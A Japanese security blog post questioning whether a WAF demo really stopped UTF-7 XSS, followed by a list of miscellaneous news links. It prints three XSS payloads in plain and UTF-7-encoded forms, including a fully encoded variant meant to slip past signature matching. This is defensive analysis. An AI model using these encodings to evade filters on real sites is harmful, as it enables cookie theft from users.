[セキュリティ] UTF-7 の XSS を WAF で防ぐ？昨日のデブサミの WAF のデモで、UTF-7 の XSS がシグネーチャで検知されて防御されていた場面がありましたが、あれは、徳丸さんもご指摘の通り、alert() または document.cookie などの断片が引っかかっただけのように思われますね。 UTF-7 については、下記の「過剰」のように表現することも出来るので、これを誤検知なくシグネーチャで検知させるのは、エンジン側で Base64 のデコードに対応しない限り難しそう。 （エンジンで対応したら重くなりそう。 対応してる WAFってあるのかな？）

textile元々: <script>alert(document.cookie);</script>通常: +ADw-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-過剰: +ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKABkAG8AYwB1AG0AZQBuAHQALgBjAG8AbwBrAGkAZQApADsAPAAvAHMAYwByAGkAcAB0AD4-

``textile元々: "><ScRiPt>alert(document.cookie);</sCrIpT>通常: +ACIAPgA8-ScRiPt+AD4-alert(document.cookie)+ADsAPA-/sCrIpT+AD4-過剰: +ACIAPgA8AFMAYwBSAGkAUAB0AD4AYQBsAGUAcgB0ACgAZABvAGMAdQBtAGUAbgB0AC4AYwBvAG8AawBpAGUAKQA7ADwALwBzAEMAcgBJAHAAVAA+-

``textile元々: @">@<input style="xss:expression(alert(document.cookie))">通常: +AEAAIgA+AEAAPA-input style+AD0AIg-xss:expression(alert(document.cookie))+ACIAPg-過剰: +AEAAIgA+AEAAPABpAG4AcAB1AHQAIABzAHQAeQBsAGUAPQAiAHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoAGQAbwBjAHUAbQBlAG4AdAAuAGMAbwBvAGsAaQBlACkAKQAiAD4-

ちなみに、デモに使われていた WAF では、Base64 のデコードには対応していませんが、その代わりに、Content-Type: ヘッダに、ユーザ指定の charset を追加する機能があるので、そちらで UTF-7 の XSS に対応しています、ということのようです。[雑談] いろいろ。

• チョコレートと交換でパスワードを教えた人、7割を超える--英調査 (CNET)

---

• 「マルウェアアカデミー賞」はブラッド・ピットとトム・クルーズ (IMPRESS)

---

• 不審者を自動認識、音声で注意 ATMに振り込め詐欺防止システム (ITmedia)

---

• セキュリティの専門家が語る「不思議の国、日本」 (ITmedia)

---

• オルタナブログ通信： 経済産業省の“セキュリーナ”が狙い過ぎな件 (ITmedia)

---

• デジタル一眼レフにライブビュー搭載のワケ (ExciteBit)

---

• 日本人なら必ず誤訳する英文 (404 Blog Not Found)

---

• 客室乗務員は時給1000円!? あこがれの仕事の現実 (J-CASTニュース)

---

• 科学なニュースとニュースの科学： 種子島に行きたい！ (ITmedia)

---

• カナダの学生、自作の無線機で宇宙にいる人と交信する (GIZMODO)

---

• イスラエル製の「うろつく」ミサイルシステム (GIGAZINE)

---

• 20世紀のインターネットを思い出すカーペット (GIZMODO)

---

• あの超大作RPG「重大な不具合」でまたも延期─発売は56億7千万年後 (bogusnews)

---

• 「テレビがつまらなくなったのは、Youtubeなど様々なメディアが登場したから」

---

• Wikipedia人口減りすぎてオワタ＼(＾o＾)／ (アルファルファモザイク)

---

• バレンタインに検索すると「危ない」有名人カップルは？ (ITmedia)

---

• 告白するタイミングを教えてくれる!? 腕時計「Loves Me」 (GIZMODO)